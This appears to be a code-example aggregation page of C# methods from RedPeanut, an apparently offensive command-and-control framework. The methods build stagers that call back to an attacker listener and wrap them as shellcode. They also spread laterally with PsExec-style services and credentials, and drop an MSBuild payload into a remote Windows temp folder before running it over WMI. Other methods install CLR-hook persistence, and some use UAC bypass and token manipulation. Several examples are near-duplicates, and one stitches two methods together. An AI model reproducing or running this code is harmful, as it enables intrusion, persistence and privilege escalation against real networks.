예제 #1
0
        private void Run()
        {
            List <string> args = new List <string>();

            if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
            {
                return;
            }
            else
            {
                //Create stager stream gzip
                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                {
                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));

                    if (lpipename == null)
                    {
                        //Http no pivot stager
                        ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }

                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                    //Create TaskMsg gzip
                    if (agent != null)
                    {
                        //Create Service stream gzip
                        source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
                                 .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
                                 .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);

                        string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));

                        //Create SharpPsExec stream gzip
                        source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
                                 .Replace("#DOMAIN#", domain)
                                 .Replace("#USERNAME#", username)
                                 .Replace("#PASSWORD#", password)
                                 .Replace("#HOSTANME#", targethost)
                                 .Replace("#ASSEMBLY#", servicestr)
                                 .Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
                                 .Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
                                 .Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
                                 .Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));

                        string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                        RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
                    }
                }
            }
        }
예제 #2
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(pipename) || profile > 0)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                        string source            = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                        Builder.GenerateExe(source, "pivot_" + filename);
                    }
                }
            }catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
예제 #3
0
        private void Run()
        {
            try
            {
                string host            = ((AgentInstanceHttp)agent).GetAddress();
                int    port            = ((AgentInstanceHttp)agent).GetPort();
                int    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                int    targetframework = ((AgentInstanceHttp)agent).TargetFramework;
                string pipename        = "";

                if (agent.Pivoter != null)
                {
                    host            = agent.Pivoter.SysInfo.Ip;
                    port            = 0;
                    profileid       = RedPeanutC2.server.GetDefaultProfile();
                    targetframework = agent.TargetFramework;
                    pipename        = agent.AgentId;
                }
                else
                {
                    host            = ((AgentInstanceHttp)agent).GetAddress();
                    port            = ((AgentInstanceHttp)agent).GetPort();
                    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                    targetframework = agent.TargetFramework;
                }

                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
                {
                    string source;

                    if (string.IsNullOrEmpty(pipename))
                    {
                        //Http no pivot stager
                        ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }

                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));

                    ModuleConfig modconfig = new ModuleConfig
                    {
                        Assembly    = stagerstr,
                        Method      = "Execute",
                        Moduleclass = "RedPeanutRP",
                        Parameters  = new string[] { "pippo" }
                    };

                    TaskMsg task = new TaskMsg
                    {
                        TaskType   = "module",
                        ModuleTask = modconfig,
                        Agentid    = agent.AgentId
                    };

                    if (agent.Pivoter != null)
                    {
                        task.AgentPivot = agent.Pivoter.AgentId;
                    }

                    source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
                             .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLRWNF))
                             .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                             .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
                             .Replace("#SHELLCODE#", null)
                             .Replace("#USERNAME#", username)
                             .Replace("#PASSWORD#", password)
                             .Replace("#DOMAIN#", domain)
                             .Replace("#PROCESS#", null);

                    string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
                    RunAssemblyBase64(
                        spawnprocess,
                        "RedPeanutSpawn",
                        new string[] { " " },
                        agent);
                }
            }
            catch (Exception)
            {
                Console.WriteLine("[*] Errore generating task");
            }
        }
예제 #4
0
        private void Run()
        {
            List <string> args = new List <string>();

            if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
            {
                return;
            }
            else
            {
                //Create stager stream gzip
                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                {
                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));

                    if (lpipename == null)
                    {
                        //Http no pivot stager
                        ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }

                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40)));

                    //Create TaskMsg gzip
                    if (agent != null)
                    {
                        ModuleConfig modconfig = new ModuleConfig
                        {
                            Assembly    = stagerstr,
                            Method      = "Execute",
                            Moduleclass = "RedPeanutRP",
                            Parameters  = new string[] { "pippo" }
                        };

                        TaskMsg task = new TaskMsg
                        {
                            TaskType   = "module",
                            ModuleTask = modconfig,
                            Agentid    = agent.AgentId
                        };

                        if (agent.Pivoter != null)
                        {
                            task.AgentPivot = agent.Pivoter.AgentId;
                        }

                        //Create Service stream gzip
                        source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
                                 .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLR))
                                 .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                                 .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);

                        string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));

                        //Create SharpPsExec stream gzip
                        source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
                                 .Replace("#DOMAIN#", domain)
                                 .Replace("#USERNAME#", username)
                                 .Replace("#PASSWORD#", password)
                                 .Replace("#HOSTANME#", targethost)
                                 .Replace("#ASSEMBLY#", servicestr)
                                 .Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
                                 .Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
                                 .Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
                                 .Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));

                        string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                        RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
                    }
                }
            }
        }
예제 #5
0
        private void Run()
        {
            try
            {
                string host            = ((AgentInstanceHttp)agent).GetAddress();
                int    port            = ((AgentInstanceHttp)agent).GetPort();
                int    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                int    targetframework = ((AgentInstanceHttp)agent).TargetFramework;
                string pipename        = "";

                if (!string.IsNullOrEmpty(process))
                {
                    if (agent.Pivoter != null)
                    {
                        host            = agent.Pivoter.SysInfo.Ip;
                        port            = 0;
                        profileid       = RedPeanutC2.server.GetDefaultProfile();
                        targetframework = agent.TargetFramework;
                        pipename        = agent.AgentId;
                    }
                    else
                    {
                        host            = ((AgentInstanceHttp)agent).GetAddress();
                        port            = ((AgentInstanceHttp)agent).GetPort();
                        profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                        targetframework = agent.TargetFramework;
                    }

                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
                    {
                        string source;

                        if (string.IsNullOrEmpty(pipename))
                        {
                            //Http no pivot stager
                            ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                            source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                        }
                        else
                        {
                            //NamedPipe enable stager
                            ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                            source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                        }

                        string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));

                        string hookfilename = RandomAString(10, new Random()) + ".dll";
                        //string clrhook = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, hookfilename, targetframework, compprofile: CompilationProfile.PersistenceCLR)));

                        string keyfilename = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, KEYFILE_FOLDER, "key.snk");

                        if (clrversion != 35 && clrversion != 40)
                        {
                            clrversion = 40;
                        }

                        source = File.ReadAllText(Path.Combine(folderrpath, CLRHOOKINSTALL_TEMPLATE))
                                 .Replace("#KEYFILE#", Convert.ToBase64String(CompressGZipAssembly(File.ReadAllBytes(keyfilename))))
                                 .Replace("#STAGER#", stagerstr)
                                 .Replace("#FILENAME#", hookfilename)
                                 .Replace("#PROCESS#", process)
                                 .Replace("#CLRVERSION#", clrversion.ToString());

                        string clrhookinstaller = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));

                        if (uninstall)
                        {
                            RunAssemblyBase64(clrhookinstaller, "PersCLRInstall", new string[] { "cleanenv" }, agent);
                        }
                        else
                        {
                            RunAssemblyBase64(clrhookinstaller, "PersCLRInstall", new string[] { "install" }, agent);
                        }
                    }
                }
            }
            catch (Exception)
            {
                Console.WriteLine("[*] Errore generating task");
            }
        }
예제 #6
0
        private void Run()
        {
            try
            {
                if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(lhost) || (string.IsNullOrEmpty(lpipename) && lport < 1) || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        string domainname = ".";
                        if (!string.IsNullOrEmpty(domain))
                        {
                            domainname = domain;
                        }

                        string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));

                        if (lpipename == null)
                        {
                            //Http no pivot stager
                            ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                        }
                        else
                        {
                            //NamedPipe enable stager
                            ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                        }

                        string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                        //Create TaskMsg gzip
                        if (agent != null)
                        {
                            source = File.ReadAllText(Path.Combine(folderrpath, SPAWNER_TEMPLATE))
                                     .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
                                     .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn)
                                     .Replace("#USERNAME#", username)
                                     .Replace("#PASSWORD#", password)
                                     .Replace("#DOMAIN#", domain);

                            string spawner = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                            Dictionary <string, string> msbuildargs = new Dictionary <string, string>();
                            msbuildargs.Add("#{taskname}", taskname);

                            MSBuildGenerator gen = new MSBuildGenerator(spawner, msbuildargs);

                            string pathdest = string.Format(@"\\{0}\C$\Windows\temp", targethost);
                            string filename = RandomAString(10, new Random()).ToLower() + ".xml";
                            string filesrc  = Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(gen.GetScriptText())));

                            string destinattionfull = pathdest.TrimEnd('\\') + @"\" + filename;

                            string destinationpath = ".";
                            if (!string.IsNullOrEmpty(pathdest))
                            {
                                destinationpath = pathdest.Replace("\\", "\\\\");
                            }

                            string destinationfilename = "";
                            if (!string.IsNullOrEmpty(filename))
                            {
                                destinationfilename = filename;
                            }

                            // Parse .cs sorce and repalce variable
                            source = File.ReadAllText(Path.Combine(folderrpath, FILEUPLOAD_TEMPLATE));
                            source = Replacer.ReplaceFileUpLoad(source, filesrc, destinationpath, destinationfilename, username, password, domainname);

                            string assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, "FileUpLoader.dll", 40)));

                            //Task agent to copy file to target host
                            RunAssemblyBase64(assembly, "FileUpLoader", new string[] { "pippo" }, agent);

                            //Run msbuld via wmi
                            List <string> args = new List <string>();
                            args.Add("action=create");
                            args.Add("computername=" + targethost);
                            args.Add("username="******"\\" + username);
                            args.Add("password="******"command=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Windows\\temp\\" + destinationfilename);

                            string s = "";
                            foreach (string ss in args.ToArray())
                            {
                                s += ss;
                            }
                            Console.WriteLine("String command: " + s);
                            RunAssembly(PL_MODULE_SHARPWMI, "SharpWMI.Program", args.ToArray(), agent);
                        }
                    }
                }
            } catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
            }
        }
예제 #7
0
        public static string ReplaceAgentProfile(string src, string serverkey, int targetframework, ListenerPivotConfig config)
        {
            string source = src
                            .Replace("#HOST#", config.GetHost())
                            .Replace("#PORT#", "0")
                            .Replace("#PARAM#", "")
                            .Replace("#SERVERKEY#", RedPeanut.Program.GetServerKey())
                            .Replace("#PAGEGET#", "")
                            .Replace("#PAGEPOST#", "")
                            .Replace("#USERAGENT#", "")
                            .Replace("#PIPENAME#", config.GetPipename())
                            .Replace("#COVERED#", "false")
                            .Replace("#TARGETCLASS#", "")
                            .Replace("#SPAWN#", config.GetProfile().Spawn)
                            .Replace("#FRAMEWORK#", targetframework.ToString())
                            .Replace("#MANAGED#", config.GetProfile().InjectionManaged.ToString());

            source = source
                     .Replace("#HEADERS#", "");

            return(source);
        }
        private void Run()
        {
            try
            {
                string host            = ((AgentInstanceHttp)agent).GetAddress();
                int    port            = ((AgentInstanceHttp)agent).GetPort();
                int    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                int    targetframework = ((AgentInstanceHttp)agent).TargetFramework;
                string pipename        = "";

                if (agent.Pivoter != null)
                {
                    host            = agent.Pivoter.SysInfo.Ip;
                    port            = 0;
                    profileid       = RedPeanutC2.server.GetDefaultProfile();
                    targetframework = agent.TargetFramework;
                    pipename        = agent.AgentId;
                }
                else
                {
                    host            = ((AgentInstanceHttp)agent).GetAddress();
                    port            = ((AgentInstanceHttp)agent).GetPort();
                    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                    targetframework = agent.TargetFramework;
                }

                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
                {
                    string source;

                    if (string.IsNullOrEmpty(pipename))
                    {
                        //Http no pivot stager
                        ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }

                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));

                    /*ModuleConfig modconfig = new ModuleConfig
                     * {
                     *  Assembly = stagerstr,
                     *  Method = "Execute",
                     *  Moduleclass = "RedPeanutRP",
                     *  Parameters = new string[] { "pippo" }
                     * };
                     *
                     * TaskMsg task = new TaskMsg
                     * {
                     *  TaskType = "module",
                     *  ModuleTask = modconfig,
                     *  Agentid = agent.AgentId
                     * };
                     *
                     * if (agent.Pivoter != null)
                     *  task.AgentPivot = agent.Pivoter.AgentId;
                     *
                     */

                    source = File.ReadAllText(Path.Combine(folderrpath, UACTOKEN_TEMPLATE))
                             .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(
                                                                             Builder.GenerateShellcode(stagerstr, RandomAString(10, new Random()) + ".exe", "RedPeanutRP", "Execute", new string[] { "pippo" })
                                                                             ))
                                      )
                             .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
                             .Replace("#BINARY#", binary)
                             .Replace("#ARGUMENTS#", arguments)
                             .Replace("#PATH#", path);

                    string uacbypass = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
                    RunAssemblyBase64(
                        uacbypass,
                        "TokenManipulation",
                        new string[] { " " },
                        agent);
                }
            }
            catch (Exception)
            {
                Console.WriteLine("[*] Errore generating task");
            }
        }